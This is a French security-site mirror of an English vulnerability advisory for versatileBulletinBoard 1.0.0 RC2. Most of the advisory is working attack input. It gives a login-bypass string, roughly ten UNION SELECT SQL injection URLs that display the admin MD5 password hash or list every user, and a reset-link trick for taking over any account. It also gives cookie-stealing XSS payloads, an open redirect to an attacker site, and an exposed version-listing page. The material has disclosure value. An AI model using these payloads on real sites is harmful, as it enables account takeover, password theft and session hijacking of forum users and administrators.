Chercher sur php.net


ground418 security
Chercher sur mysql



Voici la 202e page demandée aujourd'hui.
Img
Img2
Img3
Img4
Img6
Img7
Img8
Img9


Recherche


sur Internet
sur ground418
Alertes récentes
10-ForumCMS-JS
10-FlashSlideshowMaker-bufferOF
10-Canteen-fileInclude-SQLinject
10-getnnmdata-exec.txt
10-Sebo014-DoS
jaime mieux...

le php
l'asp
le perl
le html
le cafe noir


résultats
Exploits et Vulnérabilités logiciel sur ground418

Texte original (anglais) :

versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)

multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure



software:

site: http://vbb.eniki.de/





if magic_quotes_gpc off...



A)



i)SQL INJECTION / LOGIN BYPASS



you can login as admin typing;



login: ' or 1 and name='[adminname]'/*

pass: [whatever]



also you can login with the credentials/rights of any user, typing:



login: ' or 1 and name='[username]'/*

pass: [whatever]



ii) SQL INJECTION in "search this thread" feature when you surf the forum:

%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickame]'/*

(you can't do it manually, input field is too small, but you can modify the POST...)





iii)SQL INJECTION in index.php "select" argument

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*



iv)SQL INJECTION in index.php "categ" argument

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*



also, we have:

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*



(to list USER ID number of any user, this will be useful after, you will see... however, usually user ID for admin is "11")





v)SQL INJECTION in "to" argument when you post a private message (you need to login to do this):

http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*





vi)SQL INJECTION in search for posts feature:

%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*





vii)SQL INJECTION:

http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*





viii) SQL INJECTION when you see a user profile:

http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*





with ii), iii), iv), v), vi), vii), viii) you will see admin MD5 password hash at screen





ix) SQL INJECTION, you can list all users, this could be useful to dump all passwords from database:



http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*





to see if your installation is vulnerable just digit ' in login field, if you have a SQL error, it is



x) SQL INJECTION in "forgot password" feature, a user could manipulate the email field to send himself new passwords for any admin/user



you will receive a link like this:



http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]



to set up a new password, but... you can call this url at any time if you have the hash





combinating theese issues a user can take the full control of the board, reset all passwords...

proof of concept exploit incoming...





B)



xi) XSS:

possible cross site scripting, you can craft a malicious url to redirect a user to an arbitrary location:

http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]



and you can manipulate user cookies, poc:



http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--

http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>



also, you can craft malicious urls that manipulating sql queries will show some evil javascript, poc:



http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*





C)



xii) information disclosure:

this is an online utility, but to list all files and versions doesn't seem very safe ;)



http://[target]/[path]/getversions.php





rgod

site: http://rgod.altervista.org

mail: retrogod at aliceposta it

Les avis les plus populaires de 2010
e107remote.txt
09-pyForum-backdoor
10-ForumCMS-JS
09-
06-alternC-095.txt
09-IPB-XSS
09-jumi205
09-PhpShop-multi
09-SMF-activeXSS
Statistiques pour
cet article :

AnnéeConsultations
2010416
200988
2008116
200710
20062
Total632
partenaires






Hébergement

 
Rapide et sécuritaire
1.866.509.4313